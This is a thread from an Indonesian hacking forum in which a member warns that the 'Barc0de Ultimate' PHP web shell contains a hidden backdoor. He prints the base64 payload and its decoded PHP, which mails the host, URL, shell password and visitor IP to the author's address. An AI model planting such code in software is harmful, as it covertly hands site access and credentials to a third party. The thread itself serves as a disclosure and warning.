X-code Professional

X-code Community

Facebook group

Instagram X-code

Twitter

X-code Blog

Panel
Welcome! Anonymous

Shell Barcode stealer / keyloger

[ { NUM_COMMENT }]

Tempat pembahasan dan tutorial penggunaan tools untuk hacking, security dan forensik komputer.

Moderators: Paman, Xshadow, indounderground

Forum rules
Tool yang diupload oleh member tidak diperiksa oleh kami, mungkin saja terinfeksi oleh malware secara disengaja ataupun tidak, saran kami sebaiknya mendownload tool tersebut dari sumber pembuatnya. Bagi yang buat thread diharapkan menampilkan screenshot tool.

Shell Barcode stealer / keyloger

Postby yuans » Thu Jul 21, 2011 9:02 am

semalam iseng
bongkar bongkar shell :-D
// Barc0de Ultimate - www.code-security.com
// Author : uzanc | uzanc@live.com

ketika melihat shell barcode aku terkejut ternyata ada keyloger / script send mailer nya :-D BASE64
Code: Select all
JHZpc2l0Y291bnQgPSAkSFRUUF​9DT09LSUVfVkFSU1sidmlzaXRz​Il07DQogaWYoICR2aXNpdGNvdW​50ID09ICIiKQ0KIHskdmlzaXRj​b3VudCA9IDA7IA0KICR2aXNpdG​9yID0gJF9TRVJWRVJbIlJFTU9U​RV9BRERSIl07IA0KICR3ZWIgPS​AkX1NFUlZFUlsiSFRUUF9IT1NU​Il07DQogJGluaiA9ICRfU0VSVk​VSWyJSRVFVRVNUX1VSSSJdOw0K​ICR0YXJnZXQgPSByYXd1cmxkZW​NvZGUoJHdlYi4kaW5qKTsNCiAk​Ym9keSA9ICJCb3NzLCBhZGEgeW​FuZyB0ZWxhaCBtZW5hbmFtIGJh​Y2tkb29yIGRpIDogICR0YXJnZX​QgfCBwYXNzd29yZCA9ICRtZDVf​cGFzcyBJUCA9ICR2aXNpdG9yIj​sgQG1haWwoImFhdXphbmNAZ21h​aWwuY29tIiwiS2V5bG9nZXIgQm​Fja2Rvb3IiLCAiJGJvZHkiKTsN​CiB9IGVsc2UgeyANCiAkdmlzaX​Rjb3VudDsgDQogfSBzZXRjb29r​aWUoInZpc2l0cyIsJHZpc2l0Y2​91bnQpOw==\";


yang jika di artikan menjadi
Code: Select all
$visitcount = $HTTP_COOKIE_VARS["visits"​];
if( $visitcount == "")
{$visitcount = 0;
$visitor = $_SERVER["REMOTE_ADDR"];
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$target = rawurldecode($web.$inj);
$body = "Boss, ada yang telah menanam backdoor di : $target | password = $md5_pass IP = $visitor"; @mail("aauzanc@gmail.com",​"Keyloger Backdoor", "$body");
} else {
$visitcount;
} setcookie("visits",$visitc​ount);

jadi jangan sampe kita kena jebakan batman wkwkkwkwkwkk
maaf yah buat admin nya bukan untuk mempublikasi tapi supaya sadar saja :-D
yuans
 
Posts: 1
Joined: Fri Nov 19, 2010 3:39 am

Re: Shell Barcode stealer / keyloger

Postby pras80 » Sat Jul 23, 2011 1:36 am

makasih bro..ternyata setelah di bongkar emang bener ada bro..makasih sharenya bro.. 8-) 8-)
http://sekilapinfo.com & http://sekilap.info
Menuntut ilmu dari ayunan sampai liang lahat
User avatar
pras80
 
Posts: 54
Joined: Sat Sep 29, 2007 1:26 am
Location: end of the world

Re: Shell Barcode stealer / keyloger

Postby Sunafets.exe » Wed Mar 14, 2012 9:09 pm

wah parah,, baru tau ane ada yg bgitu,,, bisa di encode ke base64 ternyata,, jadi ini yg namanya backdoor

ane sering liat yg bgini di dalem file html yg di save di komputer bervirus...

maap klo oot :D
Sunafets.exe
 
Posts: 5
Joined: Thu Apr 07, 2011 10:12 pm

Re: Shell Barcode stealer / keyloger

Postby mildmerah » Sat Jul 07, 2012 12:08 pm

Cara convert dari base64 ke text gimana caranya gan ? u,u
mildmerah
 
Posts: 2
Joined: Mon Jan 09, 2012 3:08 am

{ FACEBOOK_COMMENT }


Return to Tools For Hacking - Security & Computer Forensic

Who is online

Users browsing this forum: Bing [Bot] and 15 guests